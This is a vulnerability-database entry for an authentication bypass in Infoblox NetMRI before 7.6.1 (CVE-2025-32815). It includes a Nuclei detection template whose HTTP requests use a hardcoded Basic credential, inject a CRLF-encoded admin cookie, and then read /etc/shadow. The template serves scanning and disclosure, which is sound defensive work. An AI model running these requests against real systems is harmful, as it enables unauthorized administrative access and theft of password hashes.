Lucene search
K

NetMRI < 7.6.1 - Authentication Bypass via Hardcoded Credentials

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 12 Views

NetMRI before 7.6.1 has an authentication bypass via hardcoded credentials vulnerability.

Related
Refs
Code
ReporterTitlePublishedViews
Family
BDU FSTEC
The vulnerability of the NETMRI monitoring software lies in its authentication procedures’ deficiencies, which allow attackers to circumvent existing security restrictions.
26 Jan 202600:00
bdu_fstec
Circl
CVE-2025-32815
22 May 202515:48
circl
CNNVD
Infoblox NETMRI 安全漏洞
22 May 202500:00
cnnvd
CVE
CVE-2025-32815
22 May 202500:00
cve
Cvelist
CVE-2025-32815
22 May 202500:00
cvelist
EUVD
EUVD-2025-16152
22 May 202515:34
euvd
NCSC
Vulnerabilities fixed in Infoblox NETMRI
23 May 202508:55
ncsc
NVD
CVE-2025-32815
22 May 202515:16
nvd
OSV
CVE-2025-32815
22 May 202515:16
osv
Positive Technologies
PT-2025-22492 · Infoblox · Infoblox Netmri
22 May 202500:00
ptsecurity
Rows per page
id: CVE-2025-32815

info:
  name: NetMRI < 7.6.1 - Authentication Bypass via Hardcoded Credentials
  author: iamnoooob,pdresearch
  severity: medium
  description: |
    An issue was discovered in Infoblox NETMRI before 7.6.1. Authentication Bypass via a Hardcoded credential can occur.
  impact: |
    Attackers can bypass authentication using hardcoded credentials to access administrative functions and read sensitive system files including /etc/shadow.
  remediation: |
    Upgrade to Infoblox NetMRI version 7.6.1 or later and change all default credentials immediately.
  reference:
    - https://rhinosecuritylabs.com/research/infoblox-multiple-cves/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-32815
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2025-32815
    cwe-id: CWE-287
    epss-score: 0.34188
    epss-percentile: 0.98204
    cpe: cpe:2.3:a:infoblox:netmri:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: infoblox
    product: netmri
    fofa-query: icon_hash="-319724102"
  tags: cve,cve2025,auth-bypass,netmri,hardcoded,infoblox,vkev,vuln

http:
  - raw:
      - |
        GET /netmri/common/SetRawCookie.tdf?name=letmein&value=%78%79%7a%0d%0a%55%73%65%72%4e%61%6d%65%3d%61%64%6d%69%6e HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic X3BtOnBtMTk3MjY=

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(set_cookie, "Skipjack-")'
        condition: and
        internal: true

  - raw:
      - |
        GET /visual/ViewerFileServlet?fileName=/etc/shadow HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'root:','bin:','netmri:')"
          - "contains(content_type, 'text/xml')"
        condition: and
# digest: 490a00463044022035af63ca07cc8d5feafe35ac1217f086aca9fe0de0519930315163a91a1f224a02203999a7b46c4c2e06a4474bd0804aac2725b66669d5b897e8836e6050c5d76ce9:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 3.16.5
EPSS0.34188
SSVC
12